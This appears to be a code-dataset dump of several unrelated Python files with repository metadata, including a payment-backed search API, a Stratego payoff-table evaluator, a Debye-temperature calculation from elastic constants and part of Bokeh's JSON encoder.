None)) # Always create a payment transaction. invoice_id = None payment = Payment(jwt=jwt.get_token_auth_header(), account_id=account_id, details=get_payment_details(query, request_json['type'])) # staff payment pay_ref = payment.create_payment_staff_search(payment_info, query.client_reference_id) invoice_id = pay_ref['invoiceId'] query.pay_invoice_id = int(invoice_id) query.pay_path = pay_ref['receipt'] # Execute the search query: treat no results as a success. try: query.search() # Now save the initial detail results in the search_result table with no # search selection criteria (the absence indicates an incomplete search). search_result = SearchResult.create_from_search_query(query) search_result.save() except Exception as db_exception: # noqa: B902; handle all db related errors. 
current_app.logger.error(SAVE_ERROR_MESSAGE.format(account_id, repr(db_exception))) if invoice_id is not None: current_app.logger.info(PAY_REFUND_MESSAGE.format(account_id, invoice_id)) try: payment.cancel_payment(invoice_id) except Exception as cancel_exception: # noqa: B902; log exception current_app.logger.error(PAY_REFUND_ERROR.format(account_id, invoice_id, repr(cancel_exception))) raise db_exception return query.json, HTTPStatus.CREATED def build_staff_payment(req: request, account_id: str): """Extract payment information from request parameters.""" payment_info = { 'transactionType': TransactionTypes.SEARCH_STAFF_NO_FEE.value } if is_bcol_help(account_id): return payment_info certified = req.args.get(CERTIFIED_PARAM) routing_slip = req.args.get(ROUTING_SLIP_PARAM) bcol_number = req.args.get(BCOL_NUMBER_PARAM) dat_number = req.args.get(DAT_NUMBER_PARAM) if certified is not None and isinstance(certified, bool) and certified: payment_info[CERTIFIED_PARAM] = True elif certified is not None and isinstance(certified, str) and \ certified.lower() in ['true', '1', 'y', 'yes']: payment_info[CERTIFIED_PARAM] = True if routing_slip is not None: payment_info[ROUTING_SLIP_PARAM] = str(routing_slip) if bcol_number is not None: payment_info[BCOL_NUMBER_PARAM] = str(bcol_number) if dat_number is not None: payment_info[DAT_NUMBER_PARAM] = str(dat_number) if ROUTING_SLIP_PARAM in payment_info or BCOL_NUMBER_PARAM in payment_info: if CERTIFIED_PARAM in payment_info: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED.value else: payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF.value elif CERTIFIED_PARAM in payment_info: # Verify this is allowed. payment_info['transactionType'] = TransactionTypes.SEARCH_STAFF_CERTIFIED_NO_FEE.value return payment_info def get_payment_details(search_request, search_type): """Extract the payment details value from the search request criteria.""" details = { 'label': TO_SEARCH_TYPE_DESCRIPTION[search_type] } if search_request.search_type == SearchRequest.SearchTypes.BUSINESS_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['business'] elif search_request.search_type == SearchRequest.SearchTypes.INDIVIDUAL_DEBTOR.value: details['value'] = search_request.search_criteria['criteria']['debtorName']['last'] + ', ' +\ search_request.search_criteria['criteria']['debtorName']['first'] else: details['value'] = search_request.search_criteria['criteria']['value'] return details
0
0
0
a7efbeae0499e8157828f5c76354ddc9e5702563
71
py
Python
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
6,215
2020-09-21T13:45:56.000Z
2022-03-31T21:21:45.000Z
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
8,448
2020-09-21T00:43:50.000Z
2022-03-31T23:56:06.000Z
airbyte-integrations/connectors/source-smartsheets/source_smartsheets/__init__.py
rajatariya21/airbyte
11e70a7a96e2682b479afbe6f709b9a5fe9c4a8d
[ "MIT" ]
1,251
2020-09-20T05:48:47.000Z
2022-03-31T10:41:29.000Z
from .source import SourceSmartsheets

__all__ = ["SourceSmartsheets"]
17.75
37
0.802817
from .source import SourceSmartsheets

__all__ = ["SourceSmartsheets"]
0
0
0
0c5b8758ff761fbeb2d01ca908ca3c7ef55e1e5d
8,198
py
Python
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
oslumbers/pipeline-psro
479ca386bf43a99fe7db372ce0017b6d3c4b7949
[ "MIT" ]
26
2020-11-04T13:50:58.000Z
2022-03-11T08:09:00.000Z
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
JBLanier/distributed-rl-for-imperfect-info-games
e150e99e433cadae27aa3ae5f6c7134f7e5c6fda
[ "MIT" ]
null
null
null
multiplayer-rl/mprl/rl/evaluation/payoff_table_gen.py
JBLanier/distributed-rl-for-imperfect-info-games
e150e99e433cadae27aa3ae5f6c7134f7e5c6fda
[ "MIT" ]
13
2020-12-07T11:39:37.000Z
2021-11-04T15:59:17.000Z
from mprl.rl.envs.stratego.stratego_spatial_multiagent_env import SpatialStrategoMultiAgentEnv
from progress.bar import Bar
import numpy as np
import dill
from multiprocessing.pool import Pool
from multiprocessing import cpu_count
35.489177
138
0.636863
from mprl.rl.envs.stratego.stratego_spatial_multiagent_env import SpatialStrategoMultiAgentEnv from progress.bar import Bar import numpy as np import dill from multiprocessing.pool import Pool from multiprocessing import cpu_count def run_dill_encoded(payload): fun, args = dill.loads(payload) return fun(*args) def apply_async(pool, fun, args): payload = dill.dumps((fun, args)) return pool.apply_async(run_dill_encoded, (payload,)) def _eval_policy_matchup(get_policy_fn_a, get_policy_fn_b, env, stratego_env_config, games_per_matchup): resample_policy_fn_a = False if isinstance(get_policy_fn_a, tuple): get_policy_fn_a, resample_policy_fn_a = get_policy_fn_a policy_a_name, policy_a_get_action_index = get_policy_fn_a(stratego_env_config) resample_policy_fn_b = False if isinstance(get_policy_fn_b, tuple): get_policy_fn_b, resample_policy_fn_b = get_policy_fn_b policy_b_name, policy_b_get_action_index = get_policy_fn_b(stratego_env_config) policy_funcs = [policy_a_get_action_index, policy_b_get_action_index] policy_a_state = None policy_b_state = None policy_states = [policy_a_state, policy_b_state] def policy_index(agent_id): if agent_id == 1: return 0 else: return 1 policy_a_total_return = 0 ties = 0 # with Bar('Evaluating {} vs {}'.format(policy_a_name, policy_b_name), max=games_per_matchup) as bar: for game in range(games_per_matchup): if resample_policy_fn_a: policy_a_get_action_index(None, None, resample=True) if resample_policy_fn_b: policy_b_get_action_index(None, None, resample=True) obs = env.reset() dones = {} infos = {} game_length = 0 while True: if "__all__" in dones: if dones["__all__"]: break game_length += 1 assert len(obs) == 1 acting_agent_id, acting_agent_observation = list(obs.items())[0] acting_policy_fn = policy_funcs[policy_index(acting_agent_id)] acting_policy_state = policy_states[policy_index(acting_agent_id)] action_index, new_policy_state = acting_policy_fn(acting_agent_observation, acting_policy_state) policy_states[policy_index(acting_agent_id)] = new_policy_state obs, rewards, dones, infos = env.step(action_dict={acting_agent_id: action_index}) player_a_won = infos[1]['game_result'] == 'won' tied = infos[1]['game_result'] == 'tied' if player_a_won: policy_a_total_return += 1 elif not tied: policy_a_total_return -= 1 elif tied: ties += 1 # print(f"game length: {game_length}") # bar.next() policy_a_expected_payoff = policy_a_total_return / games_per_matchup tie_percentage = ties / games_per_matchup return policy_a_name, policy_b_name, policy_a_expected_payoff, tie_percentage def generate_payoff_table(get_policy_fn_list, games_per_matchup, stratego_env_config, policies_also_play_against_self=True, return_matrix=False, num_processes=0): env = SpatialStrategoMultiAgentEnv(env_config=stratego_env_config) payoff_table_dict = {} tie_dict = {} results_dict = {} payoff_table_matrix = np.zeros(shape=(len(get_policy_fn_list), len(get_policy_fn_list))) payoff_matrix_i_names = [None] * len(get_policy_fn_list) payoff_matrix_j_names = [None] * len(get_policy_fn_list) if num_processes == 0: num_processes = cpu_count() pool = Pool(processes=num_processes) for i in range(len(get_policy_fn_list)): get_policy_fn_a = get_policy_fn_list[i] if policies_also_play_against_self: j_start = i else: j_start = i + 1 for j in range(j_start, len(get_policy_fn_list)): get_policy_fn_b = get_policy_fn_list[j] res = apply_async(pool, _eval_policy_matchup, (get_policy_fn_a, get_policy_fn_b, env, stratego_env_config, games_per_matchup)) if i not in results_dict: results_dict[i] = {} results_dict[i][j] = 
res print(f"submitted {i} vs {j}") for i in range(len(get_policy_fn_list)): print("waiting for and processing results now...") if policies_also_play_against_self: j_start = i else: j_start = i + 1 for j in range(j_start, len(get_policy_fn_list)): policy_a_name, policy_b_name, policy_a_expected_payoff, tie_percentage = results_dict[i][j].get() payoff_matrix_i_names[i] = policy_a_name payoff_matrix_j_names[j] = policy_b_name if policy_a_name not in payoff_table_dict: payoff_table_dict[policy_a_name] = {} tie_dict[policy_a_name] = {} payoff_table_dict[policy_a_name][policy_b_name] = policy_a_expected_payoff tie_dict[policy_a_name][policy_b_name] = tie_percentage payoff_table_matrix[i, j] = policy_a_expected_payoff print(f"got {i} ({policy_a_name}) vs {j} ({policy_b_name})") if return_matrix: return payoff_table_dict, tie_dict, payoff_table_matrix, payoff_matrix_i_names return payoff_table_dict, tie_dict def generate_single_player_payoff_table(get_policy_fn_list, play_as_agent_id, games_per_matchup, stratego_env_config, resample_policy_every_game=False): env = SpatialStrategoMultiAgentEnv(env_config=stratego_env_config) payoff_table_dict = {} tie_dict = {} payoff_table_matrix = np.zeros(shape=(len(get_policy_fn_list))) for i in range(len(get_policy_fn_list)): get_policy_fn_a = get_policy_fn_list[i] policy_a_name, policy_a_get_action_index = get_policy_fn_a(stratego_env_config) policy_func = policy_a_get_action_index policy_a_state = None policy_state = policy_a_state policy_a_total_return = 0 ties = 0 with Bar('Evaluating {}'.format(policy_a_name), max=games_per_matchup) as bar: for game in range(games_per_matchup): if resample_policy_every_game: policy_func(None, None, resample=True) obs = env.reset() dones = {} infos = {} # env.base_env.print_fully_observable_board_to_console(state=env.state) while True: if "__all__" in dones: if dones["__all__"]: break assert len(obs) == 1 acting_agent_id, acting_agent_observation = list(obs.items())[0] assert acting_agent_id == play_as_agent_id acting_policy_fn = policy_func acting_policy_state = policy_state action_index, new_policy_state = acting_policy_fn(acting_agent_observation, acting_policy_state) policy_state = new_policy_state obs, rewards, dones, infos = env.step(action_dict={acting_agent_id: action_index}) player_a_won = infos[play_as_agent_id]['game_result'] == 'won' tied = infos[play_as_agent_id]['game_result'] == 'tied' if player_a_won: policy_a_total_return += 1 elif not tied: policy_a_total_return -= 1 elif tied: ties +=1 bar.next() policy_a_expected_payoff = policy_a_total_return / games_per_matchup tie_percentage = ties/games_per_matchup payoff_table_dict[policy_a_name] = policy_a_expected_payoff tie_dict[policy_a_name] = tie_percentage payoff_table_matrix[i] = policy_a_expected_payoff return payoff_table_dict, tie_dict
7,849
0
115
abcc03631da5d5f6c8a14d3e8de962d1222734b2
123
py
Python
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
backend/todoList/admin.py
crowdbotics-apps/basic-todo-app-28878
c84718ed616ec508eeb948caa78413f964f560b6
[ "FTL", "AML", "RSA-MD" ]
null
null
null
from django.contrib import admin

from .models import ToDoItem

admin.site.register(ToDoItem)
# Register your models here.
17.571429
32
0.804878
from django.contrib import admin

from .models import ToDoItem

admin.site.register(ToDoItem)
# Register your models here.
0
0
0
b39943285433efe684d03e8d444f09fad241a11d
439
py
Python
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
bitirmetezi/venv/Lib/site-packages/where/__main__.py
busraltun/IMPLEMENTATIONOFEYECONTROLLEDVIRTUALKEYBOARD
fa3a9b150419a17aa82f41b068a5d69d0ff0d0f3
[ "MIT" ]
null
null
null
from __future__ import absolute_import

import sys
import argparse

import where

if __name__ == "__main__":
    sys.exit(main())
19.086957
110
0.708428
from __future__ import absolute_import

import sys
import argparse

import where


def main():
    parser = argparse.ArgumentParser(
        description="Find the locations of a file in the environment's paths."
    )
    parser.add_argument("filename", type=str, help="The filename to be found")

    args = parser.parse_args()

    for result in where.iwhere(args.filename):
        print(result)


if __name__ == "__main__":
    sys.exit(main())
283
0
23
9c840b83d5f099c8dd509d91b19bea7595c02e13
907
py
Python
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
1
2021-06-22T10:26:54.000Z
2021-06-22T10:26:54.000Z
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
null
null
null
rulesets/apps/class-b/on-location-change-notifier-slack/__deploy__.py
airspot-dev/iot-demo
5f8c1877192043f4118b102ad1f71326d40de858
[ "Apache-2.0" ]
1
2021-09-20T11:56:50.000Z
2021-09-20T11:56:50.000Z
name = "on-location-change-notifier-slack"

add_files = (
    "ruleset.py",
)

add_modules = True  # find modules in directory (folders having __init__.py file) and add them to container

extra_commands = (
    # ("RUN", "pip install my-wonderful-lib==1.0"),
)

labels = {
    "networking.knative.dev/visibility": "cluster-local",
    "krules.airspot.dev/type": "ruleset",
    "krules.airspot.dev/ruleset": name,
    "configs.krules.airspot.dev/slack-webhooks": "inject"
}

template_annotations = {
    "autoscaling.knative.dev/minScale": "1",
}

#service_account = "my-service-account"

triggers = (
    {
        "name": name,
        "filter": {
            "attributes": {
                "type": "subject-property-changed",
                "propertyname": "location",
            }
        }
    },
)

triggers_default_broker = "class-b"

ksvc_sink = "broker:default"
ksvc_procevents_sink = "broker:procevents"
21.093023
107
0.627343
name = "on-location-change-notifier-slack"

add_files = (
    "ruleset.py",
)

add_modules = True  # find modules in directory (folders having __init__.py file) and add them to container

extra_commands = (
    # ("RUN", "pip install my-wonderful-lib==1.0"),
)

labels = {
    "networking.knative.dev/visibility": "cluster-local",
    "krules.airspot.dev/type": "ruleset",
    "krules.airspot.dev/ruleset": name,
    "configs.krules.airspot.dev/slack-webhooks": "inject"
}

template_annotations = {
    "autoscaling.knative.dev/minScale": "1",
}

#service_account = "my-service-account"

triggers = (
    {
        "name": name,
        "filter": {
            "attributes": {
                "type": "subject-property-changed",
                "propertyname": "location",
            }
        }
    },
)

triggers_default_broker = "class-b"

ksvc_sink = "broker:default"
ksvc_procevents_sink = "broker:procevents"
0
0
0
2dbb7cad82088c634a4e4ad958527162927d1e63
4,171
py
Python
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
1
2019-11-15T20:54:04.000Z
2019-11-15T20:54:04.000Z
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy_py3
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
null
null
null
qmpy/analysis/debye/sound_waves.py
JosephMontoya-TRI/qmpy_py3
5a5aa7b25b1231801969ea042bbd2309cacc7859
[ "MIT" ]
null
null
null
#!/usr/bin/python # sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com import sys import scipy as sp from scipy import linalg from scipy.integrate import dblquad import read_file BOLTZCONST = 1.381e-23 # J/K PLANCKCONST = 6.626e-34 # J*s AVONUM = 6.022e23 # things/mol def dir_cosines(dir,coords=sp.identity(3)): """Returns a vector containing the direction cosines between vector dir, and the coordinate system coords. Default coordinate system is an orthonormal cartesian coordinate system.""" cosines = sp.dot(coords,dir)/linalg.norm(dir) return cosines def make_gamma(dc,C): """ Returns a matrix containing the modified set of elastic constants, C, transformed by the direction cosines, dc. """ Gamma = sp.zeros((3,3)) Gamma[0,0] = dc[0]**2*C[0,0]+dc[1]**2*C[5,5]+dc[2]**2*C[4,4] Gamma[0,0] += 2*dc[1]*dc[2]*C[4,5]+2*dc[2]*dc[0]*C[0,4] Gamma[0,0] += 2*dc[0]*dc[1]*C[0,5] Gamma[1,1] = dc[0]**2*C[5,5]+dc[1]**2*C[1,1]+dc[2]**2*C[3,3] Gamma[1,1] += 2*dc[1]*dc[2]*C[1,3]+2*dc[2]*dc[0]*C[3,5] Gamma[1,1] += 2*dc[0]*dc[1]*C[1,5] Gamma[2,2] = dc[0]**2*C[4,4]+dc[1]**2*C[3,3]+dc[2]**2*C[2,2] Gamma[2,2] += 2*dc[1]*dc[2]*C[2,3]+2*dc[2]*dc[0]*C[2,4] Gamma[2,2] += 2*dc[0]*dc[1]*C[3,4] Gamma[0,1] = dc[0]**2*C[0,5]+dc[1]**2*C[1,5]+dc[2]**2*C[3,4] Gamma[0,1] += dc[1]*dc[2]*(C[3,5]+C[1,4])+dc[2]*dc[0]*(C[0,3]+C[4,5]) Gamma[0,1] += dc[0]*dc[1]*(C[0,1]+C[5,5]) Gamma[0,2] = dc[0]**2*C[0,4]+dc[1]**2*C[3,5]+dc[2]**2*C[2,4] Gamma[0,2] += dc[1]*dc[2]*(C[3,4]+C[2,5])+dc[2]*dc[0]*(C[0,2]+C[4,4]) Gamma[0,2] += dc[0]*dc[1]*(C[0,3]+C[4,5]) Gamma[1,2] = dc[0]**2*C[4,5]+dc[1]**2*C[1,3]+dc[2]**2*C[2,3] Gamma[1,2] += dc[1]*dc[2]*(C[3,3]+C[1,2])+dc[2]*dc[0]*(C[2,5]+C[3,4]) Gamma[1,2] += dc[0]*dc[1]*(C[1,4]+C[3,5]) Gamma[1,0] = Gamma[0,1] Gamma[2,0] = Gamma[0,2] Gamma[2,1] = Gamma[1,2] return Gamma def spherical_integral(C,rho): """ Calculate the integral of a function over a unit sphere. """ # phi - azimuthal angle (angle in xy-plane) # theta - polar angle (angle between z and xy-plane) # ( y , x ) # ( y , x ) #def sfunc(theta,phi,args=()): # return func(theta,phi,args)*sp.sin(theta) integral,error = dblquad(func,0,2*sp.pi,lambda g: 0,lambda h: sp.pi,args=(C,rho)) return integral #direction = sp.array((1.0,1.0,1.0)) #dc = dir_cosines(direction) #C = read_file.read_file(sys.argv[1]) #C.pop(0) #C = sp.array(C,float) #Gamma = make_gamma(dc,C) #density = 7500 #kg/m**3 #density = float(read_file.read_file(sys.argv[2])[0][0]) #rho_c_square = linalg.eigvals(Gamma) #GPa #rho_c_square = rho_c_square*1e9 #Pa #sound_vel = sp.sqrt(rho_c_square/density).real #avg_vel = sp.average(sound_vel) #print Gamma #print direction #print C #print rho_c_square #print rho_c_square.real #print sound_vel," in m/s" #print avg_vel #print spherical_integral(C,density) if __name__ == "__main__": main(sys.argv[1:])
33.368
83
0.587389
#!/usr/bin/python # sound_waves.py v1.1 12-3-2011 Jeff Doak jeff.w.doak@gmail.com import sys import scipy as sp from scipy import linalg from scipy.integrate import dblquad import read_file BOLTZCONST = 1.381e-23 # J/K PLANCKCONST = 6.626e-34 # J*s AVONUM = 6.022e23 # things/mol def dir_cosines(dir,coords=sp.identity(3)): """Returns a vector containing the direction cosines between vector dir, and the coordinate system coords. Default coordinate system is an orthonormal cartesian coordinate system.""" cosines = sp.dot(coords,dir)/linalg.norm(dir) return cosines def make_gamma(dc,C): """ Returns a matrix containing the modified set of elastic constants, C, transformed by the direction cosines, dc. """ Gamma = sp.zeros((3,3)) Gamma[0,0] = dc[0]**2*C[0,0]+dc[1]**2*C[5,5]+dc[2]**2*C[4,4] Gamma[0,0] += 2*dc[1]*dc[2]*C[4,5]+2*dc[2]*dc[0]*C[0,4] Gamma[0,0] += 2*dc[0]*dc[1]*C[0,5] Gamma[1,1] = dc[0]**2*C[5,5]+dc[1]**2*C[1,1]+dc[2]**2*C[3,3] Gamma[1,1] += 2*dc[1]*dc[2]*C[1,3]+2*dc[2]*dc[0]*C[3,5] Gamma[1,1] += 2*dc[0]*dc[1]*C[1,5] Gamma[2,2] = dc[0]**2*C[4,4]+dc[1]**2*C[3,3]+dc[2]**2*C[2,2] Gamma[2,2] += 2*dc[1]*dc[2]*C[2,3]+2*dc[2]*dc[0]*C[2,4] Gamma[2,2] += 2*dc[0]*dc[1]*C[3,4] Gamma[0,1] = dc[0]**2*C[0,5]+dc[1]**2*C[1,5]+dc[2]**2*C[3,4] Gamma[0,1] += dc[1]*dc[2]*(C[3,5]+C[1,4])+dc[2]*dc[0]*(C[0,3]+C[4,5]) Gamma[0,1] += dc[0]*dc[1]*(C[0,1]+C[5,5]) Gamma[0,2] = dc[0]**2*C[0,4]+dc[1]**2*C[3,5]+dc[2]**2*C[2,4] Gamma[0,2] += dc[1]*dc[2]*(C[3,4]+C[2,5])+dc[2]*dc[0]*(C[0,2]+C[4,4]) Gamma[0,2] += dc[0]*dc[1]*(C[0,3]+C[4,5]) Gamma[1,2] = dc[0]**2*C[4,5]+dc[1]**2*C[1,3]+dc[2]**2*C[2,3] Gamma[1,2] += dc[1]*dc[2]*(C[3,3]+C[1,2])+dc[2]*dc[0]*(C[2,5]+C[3,4]) Gamma[1,2] += dc[0]*dc[1]*(C[1,4]+C[3,5]) Gamma[1,0] = Gamma[0,1] Gamma[2,0] = Gamma[0,2] Gamma[2,1] = Gamma[1,2] return Gamma def spherical_integral(C,rho): """ Calculate the integral of a function over a unit sphere. """ # phi - azimuthal angle (angle in xy-plane) # theta - polar angle (angle between z and xy-plane) # ( y , x ) def func(theta,phi,C,rho): # Test function. Can I get 4*pi^2???? x = sp.cos(phi)*sp.sin(theta) y = sp.sin(phi)*sp.sin(theta) z = sp.cos(theta) #dir = sp.array((x,y,z)) #dc = dir_cosines(dir) dc = sp.array((x,y,z)) # Turns out these are direction cosines! 
Gamma = make_gamma(dc,C) rho_c_square = linalg.eigvals(Gamma).real # GPa rho_c_square = rho_c_square*1e9 # Pa sound_vel = sp.sqrt(rho_c_square/rho) # m/s integrand = 1/(sound_vel[0]**3) + 1/(sound_vel[1]**3) + 1/(sound_vel[2]**3) return integrand*sp.sin(theta) # ( y , x ) #def sfunc(theta,phi,args=()): # return func(theta,phi,args)*sp.sin(theta) integral,error = dblquad(func,0,2*sp.pi,lambda g: 0,lambda h: sp.pi,args=(C,rho)) return integral #direction = sp.array((1.0,1.0,1.0)) #dc = dir_cosines(direction) #C = read_file.read_file(sys.argv[1]) #C.pop(0) #C = sp.array(C,float) #Gamma = make_gamma(dc,C) #density = 7500 #kg/m**3 #density = float(read_file.read_file(sys.argv[2])[0][0]) #rho_c_square = linalg.eigvals(Gamma) #GPa #rho_c_square = rho_c_square*1e9 #Pa #sound_vel = sp.sqrt(rho_c_square/density).real #avg_vel = sp.average(sound_vel) #print Gamma #print direction #print C #print rho_c_square #print rho_c_square.real #print sound_vel," in m/s" #print avg_vel #print spherical_integral(C,density) def main(argv): C = read_file.read_file(argv[0]) C.pop(0) C = sp.array(C,float) density,natoms,molmass = read_file.read_file(argv[1])[0] density = float(density) # kg/m**3 natoms = int(natoms) molmass = float(molmass) # kg/mol integral = spherical_integral(C,density) # (s/m)**3 mean_vel = (integral/12./sp.pi)**(-1/3.) debeye_temp = PLANCKCONST/BOLTZCONST*(3.*natoms*AVONUM* density/4./sp.pi/molmass)**(1/3.)*mean_vel print(debeye_temp,mean_vel) if __name__ == "__main__": main(sys.argv[1:])
1,089
0
49
c5b7670fef4ed19a20f598574ac6006d29d5300e
6,275
py
Python
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
bokeh/core/json_encoder.py
teresafds/bokeh
95b2a74ff463cfabdf9e3390951fa380166e6691
[ "BSD-3-Clause" ]
null
null
null
#----------------------------------------------------------------------------- # Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors. # All rights reserved. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a functions and classes to implement a custom JSON encoder for serializing objects for BokehJS. In general, functions in this module convert values in the following way: * Datetime values (Python, Pandas, NumPy) are converted to floating point milliseconds since epoch. * TimeDelta values are converted to absolute floating point milliseconds. * RelativeDelta values are converted to dictionaries. * Decimal values are converted to floating point. * Sequences (Pandas Series, NumPy arrays, python sequences) that are passed though this interface are converted to lists. Note, however, that arrays in data sources inside Bokeh Documents are converted elsewhere, and by default use a binary encoded format. * Bokeh ``Model`` instances are usually serialized elsewhere in the context of an entire Bokeh Document. Models passed trough this interface are converted to references. * ``HasProps`` (that are not Bokeh models) are converted to key/value dicts or all their properties and values. * ``Color`` instances are converted to CSS color values. .. |serialize_json| replace:: :class:`~bokeh.core.json_encoder.serialize_json` ''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import annotations import logging # isort:skip log = logging.getLogger(__name__) #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from json import JSONEncoder from typing import Any, List, Tuple # Bokeh imports from ..settings import settings from .serialization import Buffer, Serialized #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'serialize_json', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- def serialize_json(obj: Any | Serialized[Any], *, pretty: bool | None = None, indent: int | None = None) -> str: ''' Return a serialized JSON representation of objects, suitable to send to BokehJS. This function is typically used to serialize single python objects in the manner expected by BokehJS. In particular, many datetime values are automatically normalized to an expected format. Some Bokeh objects can also be passed, but note that Bokeh models are typically properly serialized in the context of an entire Bokeh document. The resulting JSON always has sorted keys. By default. the output is as compact as possible unless pretty output or indentation is requested. Args: obj (obj) : the object to serialize to JSON format pretty (bool, optional) : Whether to generate prettified output. If ``True``, spaces are added after added after separators, and indentation and newlines are applied. (default: False) Pretty output can also be enabled with the environment variable ``BOKEH_PRETTY``, which overrides this argument, if set. 
indent (int or None, optional) : Amount of indentation to use in generated JSON output. If ``None`` then no indentation is used, unless pretty output is enabled, in which case two spaces are used. (default: None) Any additional keyword arguments are passed to ``json.dumps``, except for some that are computed internally, and cannot be overridden: * allow_nan * indent * separators * sort_keys Examples: .. code-block:: python >>> data = dict(b=np.datetime64('2017-01-01'), a = np.arange(3)) >>>print(serialize_json(data)) {"a":[0,1,2],"b":1483228800000.0} >>> print(serialize_json(data, pretty=True)) { "a": [ 0, 1, 2 ], "b": 1483228800000.0 } ''' pretty = settings.pretty(pretty) if pretty: separators=(",", ": ") else: separators=(",", ":") if pretty and indent is None: indent = 2 content: Any buffers: List[Buffer] if isinstance(obj, Serialized): content = obj.content buffers = obj.buffers or [] else: content = obj buffers = [] encoder = PayloadEncoder(buffers=buffers, indent=indent, separators=separators) return encoder.encode(content) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Code #-----------------------------------------------------------------------------
35.055866
112
0.530837
#----------------------------------------------------------------------------- # Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors. # All rights reserved. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a functions and classes to implement a custom JSON encoder for serializing objects for BokehJS. In general, functions in this module convert values in the following way: * Datetime values (Python, Pandas, NumPy) are converted to floating point milliseconds since epoch. * TimeDelta values are converted to absolute floating point milliseconds. * RelativeDelta values are converted to dictionaries. * Decimal values are converted to floating point. * Sequences (Pandas Series, NumPy arrays, python sequences) that are passed though this interface are converted to lists. Note, however, that arrays in data sources inside Bokeh Documents are converted elsewhere, and by default use a binary encoded format. * Bokeh ``Model`` instances are usually serialized elsewhere in the context of an entire Bokeh Document. Models passed trough this interface are converted to references. * ``HasProps`` (that are not Bokeh models) are converted to key/value dicts or all their properties and values. * ``Color`` instances are converted to CSS color values. .. |serialize_json| replace:: :class:`~bokeh.core.json_encoder.serialize_json` ''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import annotations import logging # isort:skip log = logging.getLogger(__name__) #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from json import JSONEncoder from typing import Any, List, Tuple # Bokeh imports from ..settings import settings from .serialization import Buffer, Serialized #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'serialize_json', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- def serialize_json(obj: Any | Serialized[Any], *, pretty: bool | None = None, indent: int | None = None) -> str: ''' Return a serialized JSON representation of objects, suitable to send to BokehJS. This function is typically used to serialize single python objects in the manner expected by BokehJS. In particular, many datetime values are automatically normalized to an expected format. Some Bokeh objects can also be passed, but note that Bokeh models are typically properly serialized in the context of an entire Bokeh document. The resulting JSON always has sorted keys. By default. the output is as compact as possible unless pretty output or indentation is requested. Args: obj (obj) : the object to serialize to JSON format pretty (bool, optional) : Whether to generate prettified output. If ``True``, spaces are added after added after separators, and indentation and newlines are applied. (default: False) Pretty output can also be enabled with the environment variable ``BOKEH_PRETTY``, which overrides this argument, if set. 
